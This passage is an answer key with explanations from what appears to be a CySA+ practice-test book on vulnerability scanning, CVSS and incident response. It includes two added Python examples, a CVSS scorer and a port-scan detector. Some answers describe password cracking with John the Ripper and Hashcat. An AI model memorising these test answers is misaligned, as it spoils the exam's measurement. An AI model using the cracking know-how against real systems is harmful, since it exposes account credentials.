temporary solution, but it is likely that new vulnerabilities will arise soon requiring more 
patches. Blocking inbound access to the workstations would not be effective because Flash 
vulnerabilities are typically exploited after a client requests a malicious file. An intrusion 
detection system may alert administrators to malicious activity but does not perform 
blocking. 


D. The CVSS vector for this vulnerability contains the string “AV:N.” This indicates 
that the access vector is Network, meaning that an attacker can exploit the vulnerability 
remotely over the network. 
C. The CVSS vector for this vulnerability contains the string “AC:L.” This indicates that 
the access complexity is Low, meaning that an attacker can exploit the vulnerability with- 
out any specialized conditions occurring. 


C. The CVSS vector for this vulnerability contains the string “Au:N.” This indicates that 
the authentication metric for this vector is None, meaning that an attacker would not 
need to authenticate to exploit this vulnerability. 


B. This vulnerability discloses the type of database server supporting the web application 
but no other information. The CVSS vector contains the string “C:P,” which indicates 
that the Confidentiality metric is Partial, meaning that access to some information is pos- 
sible, but the attacker does not have control over what information is compromised. 


A. This vulnerability does not allow the attacker to modify any information on the sys- 
tem. This is confirmed by the CVSS string “I:N” indicating that the Integrity metric is 
None. 


A. This vulnerability does not allow the attacker to affect the availability of the system. 
This is confirmed by the CVSS string “A:N” indicating that the Availability metric is 
None. 
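The six answers above each decode one metric of a CVSS v2 base vector. To show how those metrics fit together, here is an added Python example, not from the book: it parses a v2 vector string into the metric meanings described above and computes the base score with the published CVSS v2.0 base equations (weights and formulas are the specification's; the sample vector is constructed to match the finding the questions describe).

```python
"""Decode a CVSS v2 base vector and score it.

Added example (not from the book): the metric meanings, weights and base
equations are those of the CVSS v2.0 specification; the sample vector is
constructed to match the information-disclosure finding described above.
"""
from __future__ import annotations

# Meaning of each CVSS v2 base metric value, as used in the answers above.
METRIC_MEANINGS: dict[str, dict[str, str]] = {
    "AV": {"L": "Local", "A": "Adjacent Network", "N": "Network"},
    "AC": {"H": "High", "M": "Medium", "L": "Low"},
    "Au": {"M": "Multiple", "S": "Single", "N": "None"},
    "C": {"N": "None", "P": "Partial", "C": "Complete"},
    "I": {"N": "None", "P": "Partial", "C": "Complete"},
    "A": {"N": "None", "P": "Partial", "C": "Complete"},
}

# Numeric weights from the CVSS v2.0 base equations.
WEIGHTS: dict[str, dict[str, float]] = {
    "AV": {"L": 0.395, "A": 0.646, "N": 1.0},
    "AC": {"H": 0.35, "M": 0.61, "L": 0.71},
    "Au": {"M": 0.45, "S": 0.56, "N": 0.704},
    "C": {"N": 0.0, "P": 0.275, "C": 0.660},
    "I": {"N": 0.0, "P": 0.275, "C": 0.660},
    "A": {"N": 0.0, "P": 0.275, "C": 0.660},
}


def parse_cvss2_vector(vector: str) -> dict[str, str]:
    """Split 'AV:N/AC:L/Au:N/C:P/I:N/A:N' into {metric: value}.

    Rejects unknown metrics or values and vectors missing a base metric,
    so a typo in a scanner export fails loudly instead of scoring wrong.
    """
    metrics: dict[str, str] = {}
    for part in vector.strip().strip("()").split("/"):
        name, sep, value = part.partition(":")
        if not sep or name not in METRIC_MEANINGS or value not in METRIC_MEANINGS[name]:
            raise ValueError(f"unknown or malformed metric {part!r}")
        metrics[name] = value
    missing = sorted(set(METRIC_MEANINGS) - set(metrics))
    if missing:
        raise ValueError(f"vector is missing base metrics {missing}")
    return metrics


def describe(metrics: dict[str, str]) -> dict[str, str]:
    """Map each metric to its human-readable meaning, e.g. AV -> 'Network'."""
    return {name: METRIC_MEANINGS[name][value] for name, value in metrics.items()}


def remote_unauthenticated(metrics: dict[str, str]) -> bool:
    """True when AV:N and Au:N: exploitable over the network with no login."""
    return metrics["AV"] == "N" and metrics["Au"] == "N"


def base_score(metrics: dict[str, str]) -> float:
    """CVSS v2 base score, rounded to one decimal as the specification does."""
    c, i, a = (WEIGHTS[m][metrics[m]] for m in ("C", "I", "A"))
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = (
        20 * WEIGHTS["AV"][metrics["AV"]] * WEIGHTS["AC"][metrics["AC"]] * WEIGHTS["Au"][metrics["Au"]]
    )
    f_impact = 0.0 if impact == 0 else 1.176  # a vector with no impact scores 0
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)


def severity(score: float) -> str:
    """NVD's severity bands for CVSS v2 scores."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


if __name__ == "__main__":
    # Constructed sample vector matching the finding described above.
    sample = "AV:N/AC:L/Au:N/C:P/I:N/A:N"
    parsed = parse_cvss2_vector(sample)
    for name, meaning in describe(parsed).items():
        print(f"{name}: {meaning}")
    score = base_score(parsed)
    print(f"base score {score} ({severity(score)}), "
          f"remote unauthenticated: {remote_unauthenticated(parsed)}")
```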


D. The scenario does not indicate that Dan has any operational or managerial control 
over the device or the administrator, so his next step should be to escalate the issue to an 
appropriate manager for resolution. Dan should not threaten the engineer because there is 
no indication that he has the authority to do so. Dan cannot correct the vulnerability him- 
self because he should not have administrative access to network devices as a vulnerability 
manager. He should not mark the vulnerability as an exception because there is no indica- 
tion that it was accepted through a formal exception process. 


A. In a well-managed test environment, the test systems should be configured in a near- 
identical manner to production systems. They should be running the same operating 
systems and require the same patches. However, in almost every organization, there are 
systems running in production that do not have mirror deployments in test environments 
because of cost, legacy system issues, and other reasons. 


D. The vulnerability scan of this server has fairly clean results. All of the vulnerabilities 
listed are severity 3 or lower. In most organizations, immediate remediation is required 
only for severity 4 or 5 vulnerabilities. 


A. Laura should contact the vendor to determine whether a patch is available for the 
appliance. She should not attempt to modify the appliance herself, as this may cause oper- 
ational issues. Laura has no evidence to indicate that this is a false positive report, and 
there is no reason to wait 30 days to see whether the problem resolves itself. 


C. Credit card information is subject to the Payment Card Industry Data Security Stan- 
dard (PCI DSS), which contains specific provisions that dictate the frequency of vulner- 
ability scanning. While the other data types mentioned in the question are regulated, 
none of those regulations contains specific provisions that identify a required vulnerability 
scanning frequency. 
C. Jim could resolve this issue by adding additional scanners to balance the load, reducing 
the frequency of scans or reducing the scope (number of systems) of the scan. Changing the 
sensitivity level would not likely have a significant impact on the scan time. 


C. This is a critical vulnerability in a public-facing service and should be patched 
urgently. However, it is reasonable to schedule an emergency maintenance for the evening 
and inform customers of the outage several hours in advance. Therefore, Trevor should 
immediately begin monitoring affected systems for signs of compromise and work with 
the team to schedule maintenance for as soon as possible. 


D. The best practice for securing virtualization platforms is to expose the management 
interface only to a dedicated management network, accessible only to authorized engi- 
neers. This greatly reduces the likelihood of an attack against the virtualization platform. 


A. Deploying changes in a sandbox environment provides a safe place for testing changes 
that will not affect production systems. Honeypots and honeynets are not testing environ- 
ments but, rather, are decoy services used to attract attackers. Vendor patches should not 
normally be tested in production because of the potential impact on business operations. 


B. If possible, Becky should schedule the scans during periods of low activity to reduce 
the impact they have on business operations. The other approaches all have a higher risk 
of causing a disruption. 


D. The attack vector (AV:N) indicates that the attacker may exploit this vulnerability 
remotely over the network without requiring any local user account on the targeted server. 


Chapter 3: Domain 3: Cyber Incident Response 


1. B. Lucca only needs a verifiable MD5 hash to validate the files under most circumstances. 
This will let him verify that the file he downloaded matches the hash of the file that the 
vendor believes they are providing. There have been a number of compromises of vendor 
systems, including open source projects that included distribution of malware that 
attackers inserted into the binaries or source code available for download, making this an 
important step when security is critical to an organization. 


C. The amount of metadata included in photos varies based on the device used to take 
them, but GPS location, GPS timestamp-based time (and thus correct, rather than device 
native), and camera type can all potentially be found. Image files do not track how many 
times they have been copied! 


A. Chris needs both /etc/passwd and /etc/shadow for John to crack the passwords. 
While only hashes are stored, John the Ripper includes built-in brute-force tools that will 
crack the passwords. 
B. The Sysinternals suite provides two tools for checking access, AccessEnum and 
AccessChk. AccessEnum is a GUI-based program that gives a full view of filesystem and registry 
settings and can display either files with permissions that are less restrictive than the 
parent or any files with permissions that differ from the parent. AccessChk is a command- 
line program that can check the rights a user or group has to resources. 


A. John is not responding to an incident, so this is an example of proactive network seg- 
mentation. If he discovered a system that was causing issues, he might create a dedicated 
quarantine network or could isolate or remove the system. 


C. NIST describes events like this as security incidents because they are a violation or 
imminent threat of violation of security policies and practices. An adverse event is any 
event with negative consequences, and an event is any observable occurrence on a system 
or network. 


B. In most cases, the first detection type Jennifer should deploy is a rogue SSID detection 
capability. This will help her reduce the risk of users connecting to untrusted SSIDs. She 
may still want to conduct scans of APs that are using channels they should not be, and 
of course her network should either use network access controls or scan for rogue MAC 
addresses to prevent direct connection of rogue APs and other devices. 


C. Dan’s efforts are part of the preparation phase, which involves activities intended to 
limit the damage an attacker could cause. 


B. Organizations that process credit cards work with acquiring banks to handle their 
card processing, rather than directly with the card providers. Notification to the bank is 
part of this type of response effort. Requiring notification of law enforcement is unlikely, 
and the card provider listing specifies only two of the major card vendors, none of which 
are specified in the question. 


B. Linux provides a pair of useful ACL backup and restore commands: getfacl allows 
recursive backups of directories, including all permissions to a text file, and setfacl 
restores those permissions from the backup file. Both aclman and chbkup were made up 
for this question. 


B. In cases where an advanced persistent threat (APT) has been present for an unknown 
period of time, backups should be assumed to be compromised. Since APTs often have 
tools that cannot be detected by normal anti-malware techniques, the best option that 
Charles has is to carefully rebuild the systems from the ground up and then ensure that 
they are fully patched and secured before returning them to service. 


A. FileVault does allow trusted accounts to unlock the drive but not by changing the key. 
FileVault 2 keys can be recovered from memory for mounted volumes and much like Bit- 
Locker, it suggests that users record their recovery key, so Jessica may want to ask the user 
or search their office or materials if possible. Finally, FileVault keys can be recovered from 
iCloud, providing her with a third way to get access to the drive. 
C. The series of connection attempts shown is most likely associated with a port scan. A 
series of failed connections to various services within a few seconds (or even minutes) is 
common for a port scan attempt. A denial-of-service attack will typically be focused on a 
single service, while an application that cannot connect will only be configured to point at 
one database service, not many. A misconfigured log source either would send the wrong 
log information or would not send logs at all in most cases. 
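The answer above distinguishes a port scan (many failed connections to different services within seconds) from a denial-of-service attempt or a misconfigured application (repeated failures against one service). Here is an added Python example, not from the book, that applies that distinction to connection-log lines; the key=value log format and the sample lines are constructed for illustration, so a real firewall or NetFlow export would need its own parser.

```python
"""Flag port-scan-like connection patterns in connection-log lines.

Added example (not from the book). The key=value log format and the sample
lines are constructed for illustration; a real firewall or netflow export
would need its own parser, but the windowing logic is the same.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.0.0.5 fails against many ports within seconds (the
# pattern the answer above describes), while 10.0.0.9 keeps retrying one
# database port, which looks like a misconfigured application instead.
SAMPLE_LOG = """\
2017-03-01T09:15:01 src=10.0.0.5 dst=10.0.1.20 dport=21 status=FAIL
2017-03-01T09:15:01 src=10.0.0.5 dst=10.0.1.20 dport=22 status=FAIL
2017-03-01T09:15:02 src=10.0.0.5 dst=10.0.1.20 dport=23 status=FAIL
2017-03-01T09:15:02 src=10.0.0.5 dst=10.0.1.20 dport=25 status=FAIL
2017-03-01T09:15:03 src=10.0.0.5 dst=10.0.1.20 dport=80 status=OK
2017-03-01T09:15:03 src=10.0.0.5 dst=10.0.1.20 dport=443 status=FAIL
2017-03-01T09:15:04 src=10.0.0.5 dst=10.0.1.20 dport=3306 status=FAIL
2017-03-01T09:15:04 src=10.0.0.5 dst=10.0.1.20 dport=1433 status=FAIL
2017-03-01T09:15:10 src=10.0.0.9 dst=10.0.1.30 dport=1433 status=FAIL
2017-03-01T09:15:20 src=10.0.0.9 dst=10.0.1.30 dport=1433 status=FAIL
2017-03-01T09:15:30 src=10.0.0.9 dst=10.0.1.30 dport=1433 status=FAIL
"""


def parse_line(line):
    """Parse one 'ISO-timestamp key=value ...' line into a dict."""
    ts_text, *fields = line.split()
    record = {"ts": datetime.fromisoformat(ts_text)}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    record["dport"] = int(record["dport"])
    return record


def group_failures(log_text):
    """Collect failed attempts per (src, dst) pair as time-ordered (ts, port) tuples."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_line(line)
        if record["status"] != "OK":  # successful connections are not probes
            by_pair[(record["src"], record["dst"])].append((record["ts"], record["dport"]))
    for attempts in by_pair.values():
        attempts.sort()
    return by_pair


def find_port_scans(log_text, window_seconds=60, min_ports=5):
    """Return {(src, dst): sorted failed ports} for pairs where one source
    failed against at least min_ports distinct ports inside a sliding window."""
    findings = {}
    for pair, attempts in group_failures(log_text).items():
        start = 0
        for end in range(len(attempts)):
            # shrink the window from the left until it spans <= window_seconds
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({port for _, port in attempts[start:end + 1]}) >= min_ports:
                findings[pair] = sorted({port for _, port in attempts})
                break
    return findings


def classify_pairs(log_text, window_seconds=60, min_ports=5, min_repeats=3):
    """Label each (src, dst) pair: port-scan-like, single-service failures, or other."""
    scans = find_port_scans(log_text, window_seconds, min_ports)
    labels = {}
    for pair, attempts in group_failures(log_text).items():
        ports = {port for _, port in attempts}
        if pair in scans:
            labels[pair] = "port-scan-like"
        elif len(ports) == 1 and len(attempts) >= min_repeats:
            labels[pair] = "single-service failures"
        else:
            labels[pair] = "other"
    return labels


if __name__ == "__main__":
    for pair, label in classify_pairs(SAMPLE_LOG).items():
        print(pair, label)
```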


D. Windows audits account creation by default. Frank can search for account creation 
events under event ID 4720 for modern Windows operating systems. 


A. Purging requires complete removal of data, and cryptographic erase is the only option 
that will fully destroy the contents of a drive from this list. Reformatting will leave the 
original data in place, overwriting leaves the potential for file remnants in slack space, and 
repartitioning will also leave data intact in the new partitions. 


B. Unless she already knows the protocol that a particular beacon uses, filtering out 
beacons by protocol may cause her to miss beaconing behavior. Attackers want to dodge 
common analytical tools and will use protocols that are less likely to attract attention. 
Filtering network traffic for beacons based on the intervals and frequency they are sent at, 
if the beacon persists over time, and removing known traffic are common means of filter- 
ing traffic to identify beacons. 


C. Local scans often provide more information than remote scans because of network or 
host firewalls that block access to services. The second most likely answer is that Scott or 
Joanna used different settings when they scanned. 


C. A general best practice when dealing with highly sensitive systems is to encrypt copies 
of the drives before they are sent to third parties. Adam should encrypt the drive image 
and provide both the hash of the image and the decryption key under separate cover (sent 
via a separate mechanism) to ensure that losing the drive itself does not expose the data. 
Once the image is in the third-party examiner’s hands, they will be responsible for its 
security. Adam may want to check on what their agreement says about security! 


B. A hardware write blocker can ensure that connecting or mounting the drive does not 
cause any changes to occur on the drive. Mika should create one or more forensic images 
of the original drive and then work with the copy or copies as needed. She may then opt to 
use forensic software, possibly including a software write blocker. 


A. This form is a sample chain of custody form. It includes information about the case, 
copies of drives that were created, and who was in possession of drives, devices, and cop- 
ies during the investigation. 


C. CompTIA defines two phases: incident eradication and validation. Validation phase 
activities per CompTIA’s split include patching, permissions, scanning, and verifying log- 
ging works properly. 


B. SNMP, packet sniffing, and netflow are commonly used when monitoring bandwidth 
consumption. Portmon is an aging Windows tool used to monitor serial ports, not exactly 
the sort of tool you’d use to watch your network’s bandwidth usage! 
B. James can temporarily create an untrusted network segment and use a span port or tap 
to allow him to see traffic leaving the infected workstation. Using Wireshark, he can build 
a profile of the traffic it sends, helping him build a fingerprint of the beaconing behavior. 
Once he has this information, he can then use it in his recovery efforts to ensure that other 
systems are not similarly infected. 


C. The output of lsof shows a connection from the local host (10.0.2.6) to 
remote.host.com via ssh. The listing for /bin/bash simply means that demo is using the bash 
shell. Fred hasn’t found evidence of demo accessing other systems on his local network but 
might find the outbound ssh connection interesting. 


B. Conducting a lessons-learned review after using an incident response plan can help to 
identify improvements and to ensure that the plan is up-to-date and ready to handle new 
events. 


B. If Kathleen’s company uses a management system or inventory process to capture the 
MAC addresses of known organizationally owned systems, then a MAC address report 
from her routers and switches will show her devices that are connected that are not in 
inventory. She can then track down where the device is physically connected to the port on 
the router or switch to determine whether the device should be there. 


C. When /var fills up, it is typically due to log files filling up all available space. The 
/var partition should be reviewed for log files that have grown to extreme size or that are 
not properly set to rotate. 


D. Linux permissions are read numerically as “owner, group, other.” The numbers stand 
for read: 4, write: 2, and execute: 1. Thus, a 7 provides that person, group, or other with 
read, write, and execute. A 4 means read-only, a 5 means read and execute, without write, 
and so on. 777 provides the broadest set of permissions, and 000 provides the least. 


C. Improper usage, which results from violations of an organization’s acceptable use 
policies by authorized users, can be reduced by implementing a strong awareness program. 
This will help ensure users know what they are permitted to do and what is prohibited. 
Attrition attacks focus on brute-force methods of attacking services. Impersonation 
attacks include spoofing, man-in-the-middle attacks, and similar threats. Finally, web-based 
attacks focus on websites or web applications. Awareness may help with some specific 
web-based attacks like fake login sites, but many others would not be limited by Lauren’s 
awareness efforts. 


C. Incremental mode is John the Ripper’s most powerful mode, as it will try all possible 
character combinations as defined by the settings you enter at the start. Single crack mode 
tries to use login names with various modifications and is very useful for initial testing. 
Wordlist uses a dictionary file along with mangling rules to test for common passwords. 
External mode relies on functions that are custom-written to generate passwords. Exter- 
nal mode can be useful if your organization has custom password policies that you want 
to tweak the tool to use. 
B. If business concerns override his ability to suspend the system, the best option that 
Charles has is to copy the virtual disk files and then use a live memory imaging tool. This 
will give him the best forensic copy achievable under the circumstances. Snapshotting 
the system and booting it will result in a loss of live memory artifacts. Escalating may be 
possible in some circumstances, but the scenario specifies that the system must remain 
online. Finally, Volatility can capture memory artifacts but is not designed to capture a 
full virtual machine. 


B. Re-assembling the system to match its original configuration can be important in 
forensic investigations. Color-coding each cable and port as a system is disassembled 
before moving helps to ensure proper re-assembly. Mika should also have photos taken by 
the on-site investigators to match her re-assembly work to the on-site configuration. 


D. The Signal protocol is designed for secure end-to-end messaging, and using a distinct 
messaging tool for incident response can be helpful to ensure that staff separate incident 
communication from day-to-day operations. Text messaging is not secure. Email with 
TLS enabled is encrypted only between the workstation and email server and may be 
exposed in plain text at rest and between other servers. A Jabber server with TLS may be 
a reasonable solution but is less secure than a Signal-based application. 


B. Selah should check the error log to determine what web page or file access resulted in 
404 “not found” errors. The errors may indicate that a page is mislinked, but it may also 
indicate a scan occurring against her web server. 


C. Since the drives are being returned at the end of a lease, you must assume that the con- 
tract does not allow them to be destroyed. This means that purging the drives, validating 
that the drives have been purged, and documenting the process to ensure that all drives 
are included are the appropriate actions. Clearing the drives leaves the possibility of data 
recovery, while purging, as defined by NIST SP 800-88, renders data recovery infeasible. 


C. The default macOS drive format is HFS+ and is the native macOS drive format. By 
default, it uses 512-byte logical blocks (sectors) and up to 4,294,967,296 allocation 
blocks. macOS does support FAT32 and can read NTFS but cannot write to NTFS drives 
without additional software. MacFAT was made up for this problem. 


B. Eraser is a tool used to securely wipe files and drives. If Eraser is not typically installed 
on his organization’s machines, Tim should expect that the individual being investigated 
has engaged in some antiforensic activities including wiping files that may have been 
downloaded or used against company policy. This doesn’t mean he shouldn’t continue his 
investigation, but he may want to look at Eraser’s log for additional evidence of what was 
removed. 


B. Data carving is the process of identifying files based on file signatures such as headers 
and footers and then pulling the information between those locations out as a file. Jessica 
can use common carving tools or could manually carve files if she knows common header 
and footer types that she can search for. 
D. A CSIRT leader must have authority to direct the incident response process and should 
be able to act as a liaison with organizational management. While Lauren may not have 
deep incident response experience, she is in the right role to provide those connections and 
leadership. She should look at retaining third-party experts for incidents if she needs addi- 
tional skills or expertise on her IR team. 


B. This system is not connected to a domain (default domain name has no value), and the 
default user is admin. 


A. The NX bit sets fine-grained permissions to mapped memory regions, while ASLR 
ensures that shared libraries are loaded at randomized locations, making it difficult for 
attackers to leverage known locations in memory via shared library attacks. DEP is a 
Windows tool for memory protection, and position-independent variables are a compiler- 
level protection that is used to secure programs when they are compiled. 


C. If the Security log has not rotated, Angela should be able to find the account creation 
under event ID 4720. The System log does not contain user creation events, and user pro- 
file information doesn’t exist until the user’s first login. The registry is also not a reliable 
source of account creation date information. 


A. The Linux file command shows a file’s format, encoding, what libraries it is linked 
to, and its file type (binary, ASCII text, etc.). Since Alex suspects that the attacker used 
statically linked libraries, the file command is the best command to use for this scenario. 
stat provides the last time accessed, permissions, UID and GID bit settings, and other 
details. It is useful for checking when a file was last used or modified but won’t provide 
details about linked libraries. strings and grep are both useful for analyzing the content 
of a file and may provide Alex with other hints but won’t be as useful as the file com- 
mand for this purpose. 


D. Lauren will get the most information by setting auditing to All but may receive a very 
large number of events if she audits commonly used folders. Auditing only success or fail- 
ure would not show all actions, and full control is a permission, not an audit setting. 


A. The apt command is used to install and upgrade packages in Ubuntu Linux from 
the command line. The command apt-get -u upgrade will list needed upgrades and 
patches (and adding the -V flag will provide useful version information). The information 
about what patches were installed is retained in /var/log/apt, although log rotation may 
remove or compress older update information. 


C. Under most circumstances Ophcrack’s rainbow table-based cracking will result in the 
fastest hash cracking. Hashcat’s high-speed, GPU-driven cracking techniques are likely 
to come in second, with John the Ripper and Cain and Abel’s traditional CPU-driven 
cracking methods remaining slower unless their mutation-based password cracks discover 
simple passwords very quickly. 


A. A logical acquisition focuses on specific files of interest, such as a specific type of file, 
or files from a specific location. In Eric’s case, a logical acquisition meets his needs. A 
sparse acquisition also collects data from unallocated space. A bit-by-bit acquisition is 
typically performed for a full drive and will take longer. 
A. Resource Manager provides average CPU utilization in addition to real-time CPU uti- 
lization. Since Kelly wants to see average usage over time, she is better off using Resource 
Manager instead of Task Manager (which meets all of her other requirements). Performance 
Monitor is useful for collecting performance data, and iperf is a network performance 
measurement tool. 


D. The chain of custody for evidence is maintained by logging and labeling evidence. This 
ensures that the evidence is properly controlled and accessed. 


A. Roger has memory usage monitoring enabled, with thresholds shown at the bottom 
of the chart that will generate an alarm if the trend continues. The chart shows months of 
stable memory utilization with very little deviation. While a sudden increase could happen, 
this system appears to be functioning well. Memory usage is high; however, in a well-tuned 
system that does not have variable memory usage or sudden spikes, this is often an 
acceptable situation. Windows does not have an automated memory management tool that 
will curtail memory usage in this situation. 


B. The more effort Frank puts into staying up-to-date with information by collecting 
threat information (5), monitoring for indicators (1), and staying up-to-date on security 
alerts (3), the stronger his organization’s security will be. Understanding specific threat 
actors may become relevant if they specifically target organizations like Frank’s, but as a 
midsize organization Frank’s employer is less likely to be specifically targeted directly. 


A. The Windows registry stores a list of wireless networks the system has connected 
to in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles. 
This is not a user-specific setting and is stored for all users in LocalMachine. 


B. While it may seem to be a simple answer, ensuring that all input is checked to make 
sure that it is not longer than the variable or buffer it will be placed into is an important 
part of protecting web applications. Canonicalization is useful against scripting attacks. 
Format string attacks occur when input is interpreted as a command by an application. 
Buffer overwriting typically occurs with a circular buffer as data is replaced and is not an 
attack or attack prevention method. 


A. Suspending a virtual machine will result in the RAM and disk contents being stored 
to the directory where it resides. Simply copying that folder is then sufficient to provide 
Susan with all the information she needs. She should not turn the virtual machine off, and 
creating a forensic copy of the drive is not necessary (but she should still validate hashes 
for the copied files or directory). 


A. Chrome stores a broad range of useful forensic information in its SQLite database, 
including cookies, favicons, history, logins, top sites, web form data, and other details. 
Knowing how to write SQL queries or having access to a forensic tool that makes these 
databases easy to access can provide a rich trove of information about the web browsing 
history of a Chrome user. 


B. FTK Imager Light is shown configured to write a single large file that will fail on 
FAT32-formatted drives where the largest single file is 4GB. If Chris needs to create a sin- 
gle file, he should format his destination drive as NTFS. In many cases, he should simply 
create a raw image to a blank disk instead! 
A. The simplest way to handle a configuration like this is to allow it to be reset when the 
condition is no longer true. If Christina adds the MAC address to her allowed devices list, 
this will automatically remove the alert. If she does not, the alert will remain for proper 
handling. 


B. Modern versions of Windows include the built-in certutil utility. Running 
certutil -hashfile [file location] md5 will calculate the MD5 hash of a file. 
certutil also supports SHA1 and SHA256 as well as other less frequently used hashes. 
md5sum and sha1sum are Linux utilities, and hashcheck is a shell extension for Windows. 


B. Disclosure based on regulatory or legislative requirements is commonly part of an inci- 
dent response process; however, public feedback is typically a guiding element of infor- 
mation release. Limiting communication to trusted parties and ensuring that data and 
communications about the incident are properly secured are both critical to the security 
of the incident response process. This also means that responders should work to limit the 
potential for accidental release of incident-related information. 


D. A sudden resumption of traffic headed “in” after sitting at zero likely indicates a net- 
work link or route has been repaired. A link failure would show a drop to zero, rather 
than an increase. The complete lack of inbound traffic prior to the resumption at 9:30 
makes it unlikely this is a DDoS, and the internal systems are not sending significant traf- 
fic outbound. 


D. ifconfig, netstat -i, and ip link show will all display a list of the network 
interfaces for a Linux system. The intf command is made up for this question. 


B. Address Space Layout Randomization (ASLR) is a technique used to prevent buf- 
fer overflows and stack smashing attacks from being able to predict where executable 
code resides in the heap. DEP is Data Execution Protection, and both StackProtect and 
MemShuffle were made up for this question. 


D. The Windows Quick Format option leaves data in unallocated space on the new vol- 
ume, allowing the data to be carved and retrieved. This does not meet the requirements 
for any of the three levels of sanitization defined by NIST. 


C. Angela’s best choice would be to implement IP reputation to monitor for connections
to known bad hosts. Antivirus definitions, file reputation, and static file analysis are all
useful for detecting malware, but command-and-control traffic like beaconing will typically
not match definitions, won’t send known files, and won’t expose files for analysis.


C. Restoring a system to normal function, including removing it from isolation, is part of
the containment, eradication, and recovery stage. This may seem to be part of the post-incident
activity phase, but that phase includes activities such as reporting and process
updates rather than system restoration.


A. Flow logs would show Chris’s outbound traffic flows based on remote IP addresses
as well as volume of traffic, and behavioral (heuristic) analysis will help him to alert on
similar behaviors. Chris should build an alert that alarms when servers in his data center
connect to domains that are not already whitelisted and should strongly consider whether
servers should be allowed to initiate outbound connections at all!
67. B. The NIST recoverability effort categories call a scenario in which time to recovery is
predictable with additional resources “supplemented.” The key to the NIST levels is to
remember that each level of additional unknowns and resources required increases the
severity level from regular to supplemented and then to extended. A nonrecoverable situation
exists when the event cannot be remediated, such as when data is exposed. At that
point, an investigation is launched. In a nongovernment agency, this phase might involve
escalating to law enforcement.


C. Using a forensic SIM (which provides some but not all of the files necessary for the 
phone to work); using a dedicated forensic isolation appliance that blocks Wi-Fi, cellular, 
and Bluetooth signals; or even simply putting a device into airplane mode are all valid 
mobile forensic techniques for device isolation. While manipulating the device to put it 
into airplane mode may seem strange to traditional forensic examiners, this is a useful 
technique that can be documented as part of the forensic exercise if allowed by the 
forensic protocols your organization follows. 


B. The audit package can provide this functionality. auditd runs as a service, and then 
auditctl is used to specifically call out the files or directories that will be monitored. 


D. A forensic investigator’s best option is to seize, image, and analyze the drive that Janet
downloaded the files to. Since she only deleted the files, it is likely that the investigator
will be able to recover most of the content of the files, allowing them to be identified.
Network flows do not provide file information, SMB does not log file downloads, browser
caches will typically not contain a list of all downloaded files, and incognito mode is specifically
designed to not retain session and cache information.


B. Joe can choose to isolate the compromised system, either physically or logically, leaving
the attacker with access to the system while isolating it from other systems on his
network. If he makes a mistake, he could leave his own systems vulnerable, but this will
allow him to observe the attacker.


D. NIST SP 800-61 categorizes signs of an incident into two categories, precursors and 
indicators. Precursors are signs that an incident may occur in the future. Since there is not 
an indicator that an event is in progress, this can be categorized as a precursor. Now 
Charles needs to figure out how he will monitor for a potential attack! 


D. Lessons-learned reviews are typically conducted by independent facilitators who ask 
questions like “What happened, and at what time?” and “What information was needed, 
and when?” Lessons-learned reviews are conducted as part of the post-incident activity 
stage of incident response and provide an opportunity for organizations to improve their 
incident response process. 


B. While patching is useful, it won’t stop zero-day threats. If Allan is building a plan specifically
to deal with zero-day threats, he should focus on designing his network and systems
to limit the possibility and impact of an unknown vulnerability. That includes using
threat intelligence, using segmentation, using whitelisting applications, implementing only
necessary firewall rules, using behavior and baseline-based intrusion prevention rules and
SIEM alerts, and building a plan in advance!
C. NIST describes events with negative consequences as adverse events. It might be
tempting to immediately call this a security incident; however, this wouldn’t be classified
that way until an investigation was conducted. If the user accidentally accessed the file, it
would typically not change classification. Intentional or malicious access would cause the
adverse event to become a security incident.


D. Cell phones contain a treasure trove of location data including both tower connection
log data and GPS location logs in some instances. Photographs taken on mobile devices
may also include location metadata. Microsoft Office files do not typically include location
information.


Other potential sources of data include car GPS systems if the individual has a car with 
built-in GPS, black-box data-gathering systems, social media posts, and fitness software, 
as well as any other devices that may have built-in GPS or location detection capabilities. 
In some cases, this can be as simple as determining whether the individual’s devices were 
connected to a specific network at a specific time. 


C. Documentation is important when tracking drives to ensure that all drives that should
be sanitized are being received. Documentation can also provide evidence of proper handling
for audits and internal reviews.


D. Outsourcing to a third-party incident response provider allows Mike to bring in
experts when an incident occurs while avoiding the day-to-day expense of hiring a full-time
staff member. This can make a lot of financial sense if incidents occur rarely, and
even large organizations bring in third-party response providers when large incidents
occur. A security operations center (SOC) would be appropriate if Mike needed day-to-day
security monitoring and operations, and hiring an internal team does not match
Mike’s funding model limitations in this scenario.


C. An air gap is a design model that removes connections between network segments or
other systems. The only way to cross an air gap is to carry devices or data between systems
or networks, making removable media the threat vector here.


C. Dan can look up the manufacturer prefix that makes up the first part of the MAC
address. In this case, Dan will discover that the system is likely a Dell, potentially making
it easier for him to find the machine in the office. Network management and monitoring
tools like SolarWinds build in this identification capability, making it easier to see if
unexpected devices show up on the network. Of course, if the local switch is a managed
switch, he can also query it to determine what port the device is plugged into and follow
the network cable to it!


C. NIST identifies three activities for media sanitization: clearing, which uses logical
techniques to sanitize data in all user-addressable storage locations; purging, which
applies physical or logical techniques to render data recovery infeasible using state-of-the-art
laboratory techniques; and destruction, which involves physically destroying the
media.


B. Degaussing, which uses a powerful electromagnet to remove data from tape media, is a 
form of purging. 
A. As long as Brian is comfortable relying on another backup mechanism, he can safely
disable volume shadow copies and remove the related files. For the drive he is looking at,
this will result in approximately 26GB of storage becoming available.


C. Danielle’s best bet to track down the original source of the emails that are being sent is 
to acquire full headers from the spam email. This will allow her to determine whether the 
email is originating from a system on her network or whether the source of the email is 
being spoofed. Once she has headers or if she cannot acquire them, she may want to check 
one or more of the other options on this list for potential issues. 


C. Most portable consumer devices, especially those that generate large files, format
their storage as FAT32. FAT16 is limited to 2GB partitions, RAW is a photo file format,
and HFS+ is the native macOS file format. Lauren can expect most devices to format
media as FAT32 by default because of its broad compatibility across devices and operating
systems.


C. The traffic values captured by ifconfig reset at 4Gb of data, making it an unreliable 
